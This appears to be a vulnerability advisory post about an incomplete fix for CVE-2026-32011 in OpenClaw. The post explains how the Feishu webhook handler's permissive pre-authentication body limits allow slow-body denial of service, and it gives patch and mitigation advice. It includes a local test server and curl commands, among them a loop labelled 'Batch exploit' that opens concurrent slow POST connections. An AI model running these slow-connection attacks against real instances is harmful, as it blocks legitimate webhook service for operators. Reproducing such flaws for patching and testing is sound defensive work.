OpenClaw, Incomplete Fix DoS, CVE-2026-32011 (Medium)

Listen to this Post

How the CVE Works

The vulnerability is an incomplete fix for CVE-2026-32011. The original patch tightened pre-authentication body parsing limits from 1MB/30s to 64KB/5s across several webhook handlers. However, the Feishu extension’s webhook handler was overlooked because it resides in a plugin workspace (extensions/feishu/) rather than the core `src/` directory. In extensions/feishu/src/monitor.ts, the handler uses `installRequestBodyLimitGuard` with permissive constants (FEISHU_WEBHOOK_MAX_BODY_BYTES = 1MB, FEISHU_WEBHOOK_BODY_TIMEOUT_MS = 30s). This guard is installed before the signature verification occurs. An unauthenticated attacker can exploit this by sending concurrent slow HTTP POST requests to the Feishu webhook endpoint. The server waits up to 30 seconds for the body to arrive, buffering up to 1MB per connection. By trickling data at 1 byte/sec across ~50 concurrent connections, an attacker exhausts server connection resources and memory, blocking legitimate Feishu webhook deliveries. The attack chain involves passing a rate limit check, passing a content-type check, and then holding the connection open during the slow body transfer before any authentication occurs.

dailycve form

Platform: OpenClaw
Version: <= 2026.2.22
Vulnerability: Incomplete Fix DoS
Severity: Medium
date: 2026-03-31

Prediction: Patch released 2026.3.24

What Undercode Say:

Reproduce vulnerable behavior with test server
cat > /tmp/feishu_webhook_server.js << 'EOF'
const http = require("http");
const VULN_TIMEOUT = 30_000;
const PATCH_TIMEOUT = 5_000;
function bodyGuard(req, res, timeoutMs) {
let done = false;
const timer = setTimeout(() => {
if (!done) { done = true; res.statusCode = 408; res.end("Request body timeout"); req.destroy(); }
}, timeoutMs);
req.on("end", () => { done = true; clearTimeout(timer); });
req.on("close", () => { done = true; clearTimeout(timer); });
}
http.createServer((req, res) => {
if (req.url === "/healthz") { res.end("OK"); return; }
if (req.method !== "POST") { res.writeHead(405); res.end(); return; }
const timeout = req.url === "/feishu/events" ? VULN_TIMEOUT : PATCH_TIMEOUT;
console.log(<code>[${req.url}] +conn</code>);
bodyGuard(req, res, timeout);
res.on("finish", () => console.log(<code>[${req.url}] -conn</code>));
}).listen(3000, () => console.log("Listening on :3000"));
EOF
node /tmp/feishu_webhook_server.js &
Verify vulnerability (slow body holds connection for full 30s)
time (echo -n '{"t":"'; sleep 10; echo '"}') | curl -s -o /dev/null -w "status: %{http_code}\n" -X POST http://localhost:3000/feishu/events -H "Content-Type: application/json" -H "Content-Length: 65536" --data-binary @- --max-time 35
Batch exploit with 10 concurrent slow connections
for i in $(seq 1 10); do
(echo -n 'A'; sleep 15) | curl -s -o /dev/null -X POST http://localhost:3000/feishu/events -H "Content-Type: application/json" -H "Content-Length: 65536" --data-binary @- --max-time 35 &
done
wait

Exploit:

Attack chain: Unauthenticated attacker sends concurrent slow HTTP POST requests to /feishu/events. Each connection uses the permissive 1MB/30s pre-auth body guard. By trickling data at 1 byte/sec, each connection stays open for ~30 seconds, consuming a server socket and up to 1MB of buffer memory. With 50 concurrent connections, the attacker exhausts connection handling capacity and memory, causing denial of service for legitimate Feishu webhook deliveries.

Protection from this CVE

  • Upgrade OpenClaw to version 2026.3.24 or later, where the Feishu webhook handler uses the tightened pre-auth limits (64KB/5s).
  • If immediate upgrade is not possible, temporarily disable the Feishu webhook endpoint or restrict access to trusted IP addresses.
  • Implement a reverse proxy with strict timeout and body size limits (e.g., 5s timeout, 64KB max body) in front of the OpenClaw instance to mitigate slow-body attacks.

Impact

An unauthenticated attacker can cause a Denial of Service (DoS) against any OpenClaw instance running the Feishu channel in webhook mode. With ~50 concurrent slow HTTP connections (1 byte/sec), the attacker can exhaust server connection capacity for 30 seconds per wave, block all legitimate Feishu webhook deliveries, and consume up to 50MB of memory per attack wave. The attack requires no valid credentials or signature.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top